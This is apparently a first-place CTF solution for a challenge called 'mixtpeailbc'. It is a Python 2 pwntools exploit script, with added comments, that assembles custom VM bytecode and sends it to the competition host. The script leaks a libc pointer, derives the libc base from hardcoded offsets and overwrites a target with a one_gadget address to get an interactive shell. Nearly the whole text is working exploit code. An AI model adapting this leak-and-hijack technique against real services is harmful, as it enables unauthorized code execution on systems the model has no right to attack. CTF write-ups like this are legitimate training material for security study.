1st place!!

mixtpeailbc (4 solves)

#!/usr/bin/python2
from pwn import *
from base64 import b64encode

def write_reg(reg1, reg2, imm):
    """Encode an opcode-1 instruction as 4 bytes: 1, reg1, reg2, imm.

    Every field is packed with pwntools ``p8`` (one byte each). "write
    register" is the author's name for opcode 1; the VM's actual handling
    of it is not visible in this file.
    """
    return p8(1) + p8(reg1) + p8(reg2) + p8(imm)

def load_reg(reg1, reg2, imm):
    """Encode an opcode-36 instruction as 4 bytes: 36, reg1, reg2, imm.

    Fields are packed one byte each with ``p8``. "load register" is the
    author's name for opcode 36; the VM semantics are not shown here.
    """
    encoded = p8(36)
    for field in (reg1, reg2, imm):
        encoded += p8(field)
    return encoded

def overwrite(reg, imm):
    """Encode an opcode-3 instruction as 4 bytes: 3, 0, reg, imm.

    The second byte is always zero; only ``reg`` and ``imm`` vary. Each
    field is packed with ``p8``.
    """
    header = p8(3) + p8(0)  # opcode, then the fixed zero field
    operands = p8(reg) + p8(imm)
    return header + operands

def leak(reg1, reg2, imm):
    """Encode an opcode-4 instruction as 4 bytes: 4, reg1, reg2, imm.

    All fields are packed one byte each with ``p8``. The name is the
    author's; what opcode 4 does inside the VM is not visible here.
    """
    instruction = p8(4)
    instruction += p8(reg1) + p8(reg2)
    instruction += p8(imm)
    return instruction

def input_addr(size, reg, imm):
    """Encode an opcode-34 instruction as 4 bytes: 34, size, reg, imm.

    ``size`` is packed as a single byte with ``p8`` like every other field,
    so values above 0xff are not representable.
    """
    opcode, size_b, reg_b, imm_b = map(p8, (34, size, reg, imm))
    return opcode + size_b + reg_b + imm_b

def output_addr(size, reg, imm):
    """Encode an opcode-33 instruction as 4 bytes: 33, size, reg, imm.

    Mirrors :func:`input_addr` with opcode 33; each field is one ``p8`` byte.
    """
    opcode = p8(33)
    return opcode + p8(size) + p8(reg) + p8(imm)

def imm_to_reg(reg, imm):
    """Encode an opcode-6 instruction: byte 6, byte reg, then imm as 16 bits.

    ``imm`` is packed with ``p16`` in the pwntools context endianness
    (little-endian by default), so the instruction is still 4 bytes long.
    """
    return p8(6) + p8(reg) + p16(imm)

io = remote('gold.b01le.rs', 4003)

# Instruction stream for the remote VM: one 4-byte instruction per helper
# call, assembled as a list and joined once. The name ``code`` is reused
# further down when the program is sent.
instructions = [imm_to_reg(r, r + 1) for r in range(1, 0xff)]  # reg r <- r+1, r = 1..0xfe
instructions.append(imm_to_reg(0xff, 0x800f))
instructions.append(leak(8, 0xff, 0))
# registers 1..7 with immediates 0..6
instructions.extend(load_reg(r, 0xf, r - 1) for r in range(1, 8))
instructions += [
    output_addr(6, 0xf, 0),
    input_addr(0x20, 0xf, 0),
    write_reg(2, 0xf, 0),
    write_reg(3, 0xf, 8),
    overwrite(0xf, 0x10),
    p32(0),  # four zero bytes terminate the stream
]
code = b64encode(''.join(instructions))

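io.sendlineafter('>> ', code)

# recvn blocks until exactly 6 bytes have arrived; the original recv(6)
# returns *up to* 6 bytes, and the ljust padding would then silently turn a
# short read into a wrong address. Bound to ``leaked`` rather than ``leak``
# so the helper function of that name is not shadowed.
leaked = u64(io.recvn(6).ljust(8, '\x00')) - 0x10101010101  # author's adjustment constant
# Offset pair and 0xe3b01 are constants from the author's own run; they are
# tied to that exact libc build, and any mismatch yields a wrong base.
libc_base = leaked - (0x7fbbbc6dc083 - 0x7fbbbc6b8000)
one = libc_base + 0xe3b01
io.send(p64(one) + p64(0) + p64(0x5d) + p64(0x5e))

io.interactive()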